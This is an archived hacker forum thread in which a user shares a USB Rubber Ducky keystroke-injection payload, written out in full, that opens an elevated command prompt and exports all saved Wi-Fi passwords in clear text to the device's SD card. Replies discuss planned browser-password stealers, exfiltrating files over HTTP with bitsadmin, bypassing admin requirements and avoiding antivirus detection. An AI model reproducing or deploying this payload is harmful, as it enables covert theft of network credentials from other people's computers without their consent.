Jump to content

Archived

This topic is now archived and is closed to further replies.

crashie

[Payload] Wi-Fi password stealer saving to SD.

Recommended Posts

This stealer script exports all the Wi-Fi passwords to the SD mounted in the rubber ducky.
Requirement: This one is to be used with Twin Duck firmware.
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
DELAY 500
ENTER
DELAY 300
STRING netsh wlan export profile folder=%myd%\ key=clear 
ENTER
DELAY 500
STRING exit
ENTER

Share this post


Link to post
Share on other sites

Great work with these new payloads man! keep it up! :rolleyes:

Share this post


Link to post
Share on other sites

Thanks! I've been playing around all weekend and are getting the hang of things now :P

I am currently working on a browser stealer which is a command-line only one. A small executable that does not need any admin rights of course, it will be executed from the SD and export a .txt to the SD. There are many browser stealers out there but some get flagged by the AV's like nirsofts and others are to heavy in size because of a GUI..

And btw, take a look at the bitsadmin payload.. sending files over HTTP :P

Will continue to put up all my work here, was first thinking of putting them on my website but hey.. it's all for the community :P

/crashie

Great work with these new payloads man! keep it up! :rolleyes:

Share this post


Link to post
Share on other sites

Really excited to see this. Does it require admin rights?

Yeah, sadly enough it does.. the CMD have to run as admin so the local user have to be in that group yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.

To steal the browser passwords (opera, safari, firefox, chrome) though it's not needed :P I will add that payload later this week when it's finished and tested completely. One version that saves it to the SD and one that send it out over HTTP. Bitsadmin works great for sending stuff over the Internet as HTTP but it requiers an IIS server on the other end.

I am though working on an exploit to also be able to steal the Wi-Fi passwords in clear-text without being admin as I said.. but it will take some time to finish since I'm working on it alone.

But I'll keep posting the results here :)

/crashie

Share this post


Link to post
Share on other sites

Yeah, sadly enough it does.. the CMD have to run as admin so the local user have to be in that group yes. But I am working on a solution to bypass that.. so you can run it on a regular user account with elevated privileges.

/crashie

Well.. I wrote a script using these basic techniques and it exported just fine since my user was as admin. I think the vast majority of people on windows are single users running with admin so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my sd card. I will try this script and see if it does the magic.

Share this post


Link to post
Share on other sites

Well.. I wrote a script using these basic techniques and it exported just fine since my user was as admin. I think the vast majority of people on windows are single users running with admin so it's actually pretty rare to find someone smart enough to add a local regular user. My problem was I couldn't get wmic to find the DUCKY label and output to my sd card. I will try this script and see if it does the magic.

Yeah, you're right :P Most of the users run as local admin. The wmic should work great.. works fine here at least :) Also have in mind your keyboard layout so it have the right symbols.. this one won't work with danish, norwegian, swedish layouts because a missing ^ in the properties file..

Share this post


Link to post
Share on other sites

I'm not able to get this command to export my profile. I've tried this on two different computers but I get a response like "The filename, directory name, or volume label syntax is incorrect." for a command like "netsh wlan export profile key=clear". Anyone else having issues with this? I am logged in as an admin, and I've also tried to run cmd as administrator.

Share this post


Link to post
Share on other sites

I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to right? Let windows do the work.

http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html

I plan on checking this out sometime when I get home tomorrow. But if the article is correct(Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista when they changed the way windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.

Share this post


Link to post
Share on other sites

I was reading through Tim Tomes' website when I found this link and thought of this thread. Why fight with admin rights when you don't need to right? Let windows do the work.

http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html

I plan on checking this out sometime when I get home tomorrow. But if the article is correct(Tim Tomes linked to it, and he's freakin' awesome) those keys aren't protected, they're just obscured a bit in a proprietary way (best security ever), so that settings can still be imported and exported. The reason why it would be this way baffles me, which is why I still intend to check it out for myself. The article was written for Vista when they changed the way windows handles wireless PSKs, which I don't believe has changed again yet. Please correct me if I'm wrong.

Hey I have added your idea to my power-ducky toolkit, It should work but I don't have a windows laptop with wireless to test. https://forums.hak5.org/index.php?/topic/30333-power-ducky-toolkit/

Share this post


Link to post
Share on other sites

You can't recover wifi keys without admin access. I've already attempted it, aswell as taking a look at some of Microsoft's tutorials on how the encryption angorithm works. It's impossible to recover the keys without the correct permissions. The payload "ULTIMATE DATA THEIF!" does way more than just stealing wifi passwords.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...